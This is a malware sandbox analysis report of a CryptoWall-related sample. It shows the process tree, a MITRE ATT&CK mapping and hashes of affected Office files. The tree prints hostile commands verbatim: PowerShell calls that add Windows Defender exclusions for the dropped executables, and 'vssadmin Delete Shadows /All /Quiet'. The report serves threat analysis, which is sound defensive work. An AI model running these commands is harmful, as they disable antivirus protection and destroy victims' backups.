      PID:8132
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7516
- - C:\Users\Admin\AppData\Local\Temp\9.exe
    "C:\Users\Admin\AppData\Local\Temp\9.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\9.exe'
      4⤵
      PID:4420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9.exe'
      4⤵
      PID:4220
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      PID:4264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3612
- - C:\Users\Admin\AppData\Local\Temp\8.exe
    "C:\Users\Admin\AppData\Local\Temp\8.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1572
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\8.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4300
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '8.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      PID:7056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:896
- - C:\Users\Admin\AppData\Local\Temp\7.exe
    "C:\Users\Admin\AppData\Local\Temp\7.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7.exe'
      4⤵
      PID:4224
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '7.exe'
      4⤵
      PID:876
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      PID:5324
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7468
- - C:\Users\Admin\AppData\Local\Temp\6.exe
    "C:\Users\Admin\AppData\Local\Temp\6.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\6.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:616
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '6.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6436
- - C:\Users\Admin\AppData\Local\Temp\5.exe
    "C:\Users\Admin\AppData\Local\Temp\5.exe"
    3⤵
    - Executes dropped EXE
    PID:1984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '5.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5012
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      PID:1568
- - C:\Users\Admin\AppData\Local\Temp\4.exe
    "C:\Users\Admin\AppData\Local\Temp\4.exe"
    3⤵
    - Executes dropped EXE
    PID:1580
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\4.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '4.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5800
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      PID:6504
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3316
- - C:\Users\Admin\AppData\Local\Temp\3.exe
    "C:\Users\Admin\AppData\Local\Temp\3.exe"
    3⤵
    - Executes dropped EXE
    PID:2788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\3.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:396
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '3.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4128
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7036
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      PID:6520
- - C:\Users\Admin\AppData\Local\Temp\2.exe
    "C:\Users\Admin\AppData\Local\Temp\2.exe"
    3⤵
    - Executes dropped EXE
    PID:2540
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\2.exe'
      4⤵
      PID:4448
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '2.exe'
      4⤵
      PID:4900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7504
- - C:\Users\Admin\AppData\Local\Temp\1.exe
    "C:\Users\Admin\AppData\Local\Temp\1.exe"
    3⤵
    - Executes dropped EXE
    PID:1820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1.exe'
      4⤵
      PID:4772
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5336
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\$77-system32'
      4⤵
      PID:5836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '$77-system32'
      4⤵
      PID:6756
- C:\Users\Admin\AppData\Local\Temp\CryptoWall.exe
  "C:\Users\Admin\AppData\Local\Temp\CryptoWall.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2592
- - C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    3⤵
    - Drops startup file
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:2292
  - - C:\Windows\syswow64\svchost.exe
      -k netsvcs
      4⤵
      System Location Discovery: System Language Discovery
      PID:1308
  - - C:\Windows\syswow64\vssadmin.exe
      vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      System Location Discovery: System Language Discovery
      Interacts with shadow copies
      PID:1572

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt

Filesize
27KB

MD5
ddda6be28efa60442c9a2f5bb96db287

SHA1
a19431a07d5c7e3e2f1a9da70b8b97ae5da750cb

SHA256
ee864134fcb009d959c93d3b3aa051f44b72a9ea92a66841214794228d544e6d

SHA512
0996966d1fb88bbeeff5fff2b599eb88a49b7e3b7ca3b09ed21cce509848cbfa0b91670ae75dfefcbe0ec95b0da05f4e31e6ecbc15919a62c0520d8cd58cef4c

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_F_COL.HXK

Filesize
635B

MD5
3a6ad6b67d172aa58ce5c379fd449e5e

SHA1
a34e4abc5d2d1757addda2e4ce513392ea2cf53a

SHA256
5186bfa574a6398c33c2ae4393edc09ac13af1703e72735c91e74dff24b858b2

SHA512
a544642ba5f6ba1c7469e20f14ab92586a290a2bdd19d73c6a9f06caf539ff487f0d6a97ebf0b6d4fbafde2be36e41878aadbcad886af5673e449c9588765103

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_K_COL.HXK

Filesize
634B

MD5
f6fe9901b3b057de715f53a5b89e2ea7

SHA1
c28511422f5286f7a8aec1138edb2de29a009a33

SHA256
41afbdb6dea03d19ac1e2f9b1976600bcd8eba33e410d38296314917de95ef84

SHA512
0dba0a59e8da67307a71f7694868cc31647edf33dc6e2a23db5d69e0df8471eff4487831b13583a7a3ea78ed3999ea712b5bcba43060ff10d6cf03d7f7e54190

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF

Filesize
862B

MD5
5541b6c16ef2d19589be4a26725b1ca2

SHA1
e7d77545f6f331b1f3953075ea31ddcf78343cdb

SHA256
cec7aa1e84245c0fcbd34b2b24861a9594c5d96da8f85d1de1606d6c6db5abf1

SHA512
0db55b4eb0cae8ab821072d7b48ab11883e1b91fec6d78454a07542041a4893c775dc20458ed8c68d028de20b44522386191282154285a000d522b4aa2aca09e

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF

Filesize
743B

MD5
81e7c0b2df648e437c73e2ad8945935f

SHA1
3326a5023e19d1eb7854e46099913ec2b6075766

SHA256
c3e34123f41a86021696f886ea8130f4cd5845cd08a0c4bb6bfcd92d16259804

SHA512
8098b072c1c1cd9c3694f5b2cf7b37b95ae275da07e8cf057cad08f203c565b8eb8a04c83560b0e21eefefade0a4bc8333dc27576e931fbc0efea1bcf37febcd

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\SIST02.XSL

Filesize
239KB

MD5
8bbf3990f21f1e11abc666e5bb20d75c

SHA1
e850deacd3f0918c19a745de2b94cc995bf16430

SHA256
8e1dbf89c52d7e83960fe975380c60e6017a80aeeace7652250567bfe57f0c63

SHA512
42f4090dfb2fd212f62e58e710a07bd3ddcd54fc698c9a1ad9e3cd78ddadda63052165544991a0360cbf7eba3606e742ba55a31a5fc60e276b4b011e6bc292ab

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\BG_ADOBE.GIF

Filesize
24KB

MD5
33a414d5c426aab22ba4e448e9b808b9

SHA1
19dec4871d2a94a6cea985c470d340b74374f694

SHA256
782fa591e629efca7d1bbf0ffb338f65b428a926749c7e98f47489521f264c73

SHA512
64ecc89f27aa0eb829665f3fbbafc7f2715f244f1e052840a9002eba7c424d5f8dac22e8b0a4eff8b5e8049ce3655f94a73aa245f77fa1502aa73bda523c3809

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\BUTTON.GIF

Filesize
706B

MD5
9b87658529fb24a919b204c50110668f

SHA1
e4c4dfa0a26bfef77f343079446a3ec35c785519

SHA256
1b1312471514a3e9f331226314895945cbad4c10ae50a84ad901ca4525485591

SHA512
2f077c787c37dd7da9ef979df62fbdf06e6ce4b6e09fce00324ee93adb13f164c5be19acc426992f57205ea3165b8a7454dbe8dcf8b43f08c8f27ee1286332a1

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_OFF.GIF

Filesize
1017B

MD5
f1c570d0a3b4af592207459afc715391

SHA1
4df3effc023663413aff5c66d2e00cedea542849

SHA256
0ca7ee2b66ffe40cd1587afc32f09921283d0bdbbcd146eb6c6b7ee773f20a77

SHA512
1cafe4f4a7b671a78d1a1e3a3879e6165efae50dcf530542d12273448ac4da7891da8495327c321d3cb7e901ee3cb392316bbbd84cca08ab64f6c8c5fcea1662

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert\TAB_ON.GIF

Filesize
1KB

MD5
e2a2b1879042db2bf76ff70d865a6a75

SHA1
5899a97467df55d92399d9e8520db046eed70e24

SHA256
2b22502769a43a94bff4656d0bcbd2c6175336494e2368d81af02fc95d1636fe

SHA512
6c948de96a4ba3d4ce45f72998619fa237e7c14c4e65ec4fd1cb78e792fb81e6676a53e665966705a129025649ce3c575fd63796da2e965fb1061cd8ce861abe

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Casual.gif

Filesize
6KB

MD5
9c244a1375103907f2449d6f7847b440

SHA1
98b8721ee60dda3f2349062426de6171c13f29f4

SHA256
e5d57520e5d0a7bf1d7c6849593da3ab0e3ca69410214846befca2439f7fdaca

SHA512
46e1fb67774233062e4e4c7e0984cf618c11d410562f644389fbbdbb373262f44c0e67c156ab6eafd7e89b0feda5ff3a1be2b36e105387b3ef438a58a573fa6e

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Country.gif

Filesize
31KB

MD5
0266f8c8a90e212ccad46d83670620af

SHA1
8f1fc39237c525cd126f1b194868342ab3f1201f

SHA256
7dc979533ef459805f3e30b8af44cabd0b3e4aaf4bb6ebd75a251c77a6391533

SHA512
1bd7c30bcb6be739a4448650a856e0df942e34f747f8cef1501fc915e409e8b1f8612227824cb15548dcf6302a57569a77c2f70feee8abb14ab44d1a0c17a958

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Earthy.gif

Filesize
5KB

MD5
38d4aa33bbcb8f59122aea5b30861839

SHA1
f459baca33140a4da5e1dd51e63833b01b46715f

SHA256
2bf00bf1e858c7666b39b1b420b6ca1a0af55a199cf295586eafe76981d93ea9

SHA512
e629c29126775c469993d203d61654cb785baeee59a0313f8342927d4f8b663c46e7c636c99db5a1dcc53cd3e568fcc3ca63c46adfd1ae7b5c60163d48cacb19

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_GreenTea.gif

Filesize
22KB

MD5
a2e8c6251cc7c8d426c4fbf7e469d594

SHA1
992c76a7ff9c5be35e5e0c4c4eb9b68c9e1589c8

SHA256
0b5953799f673c54743190e8ecb4aa197274c3a489f4f7c7fccb5350339117fb

SHA512
dda8875695df4f0546d2d85957f8d05a0f991ab4d8ff09287a907c58f7301820de9ada2ace32aa642babeafa5c168a5d23b3c47e56a3348362c2999eb135c3d0

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Groove.gif

Filesize
627B

MD5
6ff053d03fd5a2ee2cbdfb3734c89c50

SHA1
d9c01129fedcc7a01aaadd12561bb968988cf91f

SHA256
89e0735a7849544ef4effc78ae890fdf7e6b511c0ec4e2fdd4032697f82f1b59

SHA512
917495fe30b1c4212e22c7b97527befe616cdb07ae27ad5fb6dfa0293ea37842b9e8d272dec0e51b9bf8ef7ca26a512676e89e081ca07253e19e04482027f68d

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_LightSpirit.gif

Filesize
8KB

MD5
b29fdbd36445ed56b8bb1646083b7d0b

SHA1
e55c4304c0e4924c9d331f6a3ae857e24bfdc18f

SHA256
284699f06d9782cd10fe351416bbf43228f0438f9e9790608ab9dd6e2211a7b6

SHA512
0b40049ddec399d4537eb966e0bfacfc73c9a208e8109c225e9c4ee4083efb6f9d5a167860ce6aba74ea972281c1b1b2af85f4dee862f97d34d6e34b9c899f39

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_OliveGreen.gif

Filesize
15KB

MD5
300c5be733f81aa424658fb70cf1a51a

SHA1
e6c196b55f1296addbfd773465734c5661d727e1

SHA256
1df9e4fce6f5764c6b5f5ab0817499cd36c26bfaf8875cabb180544debce1f33

SHA512
8b529103ffe557d3f3344a05eb7d7673085b994709567e8e71a92d78a274810650c20251f8de80fd3663efb9d5fc01cc1868e9d629f9b000fe38f8c1374d0138

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_Premium.gif

Filesize
6KB

MD5
06350a6a350c518b286ac85e0f9e061c

SHA1
09d0a13e5b47af31700cc0c4f17301a4c8b0d0ef

SHA256
99c5c8acbda8c7b939cfe851b7ea06cae67e3808fbf154b0436701071a1d1ce6

SHA512
e7284d8aa6b0c4f6d4df8f7b83e50fc8921a09d24c3f37e65659cbddbecc2a41c63522e8d21e037ac143cc36a92b623289b12a8be7c825cbaaa070e100543781

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_SlateBlue.gif

Filesize
20KB

MD5
f6e679b6385deb614e8c55d8532f39af

SHA1
a97defa9b561334903f62c4abe3ea6ff5443ab69

SHA256
a1e5f7b7154c10f05f02efc49c724455329afa59c333ce13e0fe17317a87dec0

SHA512
aef878160b8a47229c91421c4b6999ec60b31b74fb323189e98edc8b2b877bac9e7e98cc44317748cda9195266fceda26c849cca81112b9dc7a787de81500e77

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif

Filesize
6KB

MD5
3b237964c67cc891afa682d4211579e8

SHA1
08a6986199ae2e6230ea591aed2b036ee1fdf35d

SHA256
d43623be192d49027fd706c80bd72d13d05c842fcd4b5adaab258a568dc8c90f

SHA512
3e55a902a905cf135d3dfee42b2adf16eed2c5ae1bf7a5d3e1191c11ae1205df53a7a23aa09e02b3702cf2b496f3cc4defd7528b1dfadc2f08545e197ab8b067

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_VelvetRose.gif

Filesize
15KB

MD5
b35687a8019f7b9b6a01b4590197db37

SHA1
fc21eba0e82a5e9085a05b0d00a91db90fabfe9e

SHA256
7228c275ab60d93366b85c105ea7a3aaf61eacda46c19e67a7c212758e9a86f2

SHA512
40879f1e5164fe002545b5e5476928fe89e486b6125d9f8e4bfde3a76231e7d4d57fc74bb5ff8d7880bf48879bca0e680dbe3f8e4ac8e381f354b1424d4e1192

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg

Filesize
3KB

MD5
5eb74bfd47a38e32232891b1a23a3ed4

SHA1
98c6c12a3fdddb84198a932db7c5f052dfe43030

SHA256
4f5ba8d2907d614bec4a58bc67e26fae10c5eaf57cbdfe4a3c93ee1133b21618

SHA512
907b16dda1c4553369c482cfc854c483841a659b80f32f015bb9ca0870d38524706018c52c62dbf279ab55e80209a2568c7d74440799bfa1365cd46a455eb73f

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrowMask.bmp

Filesize
2KB

MD5
2e8f2c6191959ae9f1aea23e2227edf3

SHA1
4c0f490c9928261f33040e0e946a7c5a4b17986b

SHA256
a41bc86aab227a34c7f40a10128c09d1d687332471d309afbef23a9c898ade33

SHA512
f7e99b09d8b3d2ae4cbadd5a8e1a273778f67f2388d6f0654a38991be1f769b22dc6917364b33ea227c9c4b3ca3d83415b5f87bf1e2a26cd7416f5c77cbb42a7

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FORM.ICO

Filesize
839B

MD5
fa48c3aa28cfabd8eb2a9538a80d7567

SHA1
93207a0c0620b3073fe875f3350eab1bc08f3dd8

SHA256
bf6d7addb1c8996e377ff3cad571308338192dfb9e05be948ad547156ac1b148

SHA512
2ec62d87d79a603b338a2878be6829b4504a11d093c224916376866f872616920b22a3f9591a11ed6035df80d90bdb95cd5a8f56cc5f14b3a187b06ba9d2d07f

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormToolImages.jpg

Filesize
7KB

MD5
b69e87c6de8edf42c110899ecfaa6f66

SHA1
c91e4fd7a7d8e233883df3f187413d0f8c474add

SHA256
37d5702c6b371b59e3b8bee8861dcd4233d87cd0dc60e2a9b51b6a5bf95b7bd3

SHA512
f759a126f7bb290c1bb43137623e03612a92cbb68b59fe9d34d1b0f61bd7f6e8a27708d58528405317cb8eb2651665259a8d07b73ce198a7f3241b127a6b2a19

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\HEADER.GIF

Filesize
776B

MD5
459c91103a37d6c8e2ae96396949cc97

SHA1
70280d36d966d5cf6de1175c0d3e4bf84f45540e

SHA256
b09e9eb9d6cefb4db4a66d89ce13303b94d63bbb5473a1a8a4b922db7f034072

SHA512
6f1a369a41457637168d539e166a11d14f08bcdde13601c5ae2abc61806b38e1a77acdad14d2f013c7ba320a45b0553701d0bcfebba345d9864aebbfaaad5ec6

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\background.gif

Filesize
844B

MD5
3c133d1b56ea183a6c7a4d5f0532f9b2

SHA1
42973bdd2bb781b0a520fa7e601a606846f6013e

SHA256
46c0407437d6f2208388de79f4cf7023c56ce21ac560a936e79a52821c79fc84

SHA512
4e22342cf716d30fdbc83d1243630228c4ceaf1506a9d90f902244a0d651dd9a66846336d632989982dfdedf57378dd15bcc65dc2e85039878f95739a93da04e

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\HEADER.GIF

Filesize
888B

MD5
0deed6c87315acd70fb84aec842e5b3e

SHA1
206890135cb1584013b855206282cfea1e4c2784

SHA256
a2a1e231d5246c8dcc9c0172e1a4fb2d0d5c43363b8ac526a0d3d2f83f080941

SHA512
22de8aa21b2c37b623338accca27b0de030ac8ac293c70fd5ef1bcc035806eb0a834e06c700e8e49ab29553d697695c56f941c6cd2776482225834689234e889

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\HEADER.GIF

Filesize
669B

MD5
e59303d70532f403fe88f37f69c50689

SHA1
3a635c595ea9f33603412809a8589927e5340c84

SHA256
74726e9d3e5a95235702e5a300d0aa2c4b1862a1038c49912179d9fed4bc33b0

SHA512
f9489f791bcb31b91cfe47c270416facc4c36441995527fe2008ef7c5bbe075c6f68c098a65776f4e31831ed68d263e056f8bad474f7aecef2ae6df687946426

Download Submit
